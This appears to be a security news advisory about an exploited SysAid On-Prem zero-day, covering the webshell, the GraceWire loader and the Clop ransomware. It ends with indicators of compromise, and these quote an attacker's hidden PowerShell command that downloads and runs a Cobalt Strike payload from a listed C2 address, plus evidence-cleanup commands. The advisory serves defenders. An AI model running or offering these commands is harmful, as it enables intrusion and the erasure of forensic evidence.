SysAid On-Prem software has been reported with a 0-day vulnerability determined during an incident response investigation.
According to Microsoft, attackers are exploiting this zero-day vulnerability to infiltrate corporate servers, with the aim of stealing sensitive data and deploying the notorious Clop ransomware.
This report highlights the urgent need for companies to prioritize their cybersecurity measures to protect their valuable assets from malicious attacks.
SysAid is a powerful and versatile software solution designed to streamline and enhance IT service management workflows across an organization.
It offers a comprehensive suite of tools and features that enable efficient and effective management of a wide range of IT services, ensuring seamless operations and improved productivity.
SysAid acted swiftly upon the vulnerability and communicated with its mitigation solution. Additionally, an upgraded version of the software has also been released, which fixes this vulnerability.
The vulnerability was associated with Path Traversal, leading to remote code execution within the SysAid on-prem software.
However, this vulnerability was exploited by a threat group known as Lace Tempest. The threat actors uploaded a WAR archive, which contains a WebShell and other payloads, into the webroot of the SysAid Tomcat web service.
SysAid IT Software 0-day Flaw
The WebShell provided the threat actor with unauthorized access and control over the compromised system, which was utilized by the threat actor to execute a PowerShell script that executes a malware loader under the name user.exe.
This was used to load the GraceWire trojan, which was injected into either spoolsv.exe, msiexec.exe, or svchost.exe processes.
Once the threat actor gained initial access and deployed the malware, they used a second PowerShell script to clean any trace associated with their activities from the disk and weblogs. Moreover, the threat actors also deployed the MeshAgent remote admin tool along with the trojan.
PowerShell Script Analysis
The first PowerShell script used was to Launch the Malware loader, which also lists all files placed in the C:Program FilesSysAidServertomcatwebappsusersfiles directory and removes any files used during the attack, including the usersfiles.war file and any files matching C:Program FilesSysAidServertomcatwebappsusersfilesuser.*
The second PowerShell script used was to erase evidence from Victim servers, which sleeps for 5 seconds for the exploit to complete and removes any lines in log files found within the SysAidServerrootWEB-INFlogs and SysAidServertomcatlogs directories.
There was a third PowerShell script, which was used to download and execute CobaltStrike listeners on the victim host for further actions.
A complete report that provides detailed information about the exploitation, script code, and other information has been published by SysAid.
Indicators of Compromise
Hashes
| Filename | Sha256 | Comment |
| user.exe | b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d | Malicious loader |
| Meshagent.exe | 2035a69bc847dbad3b169cc74eb43fc9e6a0b6e50f0bbad068722943a71a4cca | Meshagent.exe remote admin tool |
IP Addresses
| IP | Comment |
| 81.19.138[.]52 | GraceWire Loader C2 |
| 45.182.189[.]100 | GraceWire Loader C2 |
| 179.60.150[.]34 | Cobalt Strike C2 |
| 45.155.37[.]105 | Meshagent remote admin tool C2 |
File Paths
| Path | Comment |
| C:Program FilesSysAidServertomcatwebappsusersfilesuser.exe | GraceWire |
| C:Program FilesSysAidServertomcatwebappsusersfiles.war | Archive of WebShells and tools used by the attacker |
| C:Program FilesSysAidServertomcatwebappsleave | Used as a flag for the attacker scripts during execution |
Commands
CobaltStrike
C:WindowsSystem32WindowsPowerShellv1.0powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘http://179.60.150[.]34:80/a’)
Post-Compromise Cleanup
Remove-Item -Path “$tomcat_dirwebappsusersfilesleave”.
Remove-Item -Force “$wappsusersfiles.war”.
Remove-Item -Force “$wappsusersfilesuser.*”.
& “$wappsusersfilesuser.exe”.
Antivirus Detections
Trojan:Win32/TurtleLoader
Backdoor:Win32/Clop
Ransom:Win32/Clop
Secures your storage & backup systems With StorageGuard – Watch a 40-second Video Tour.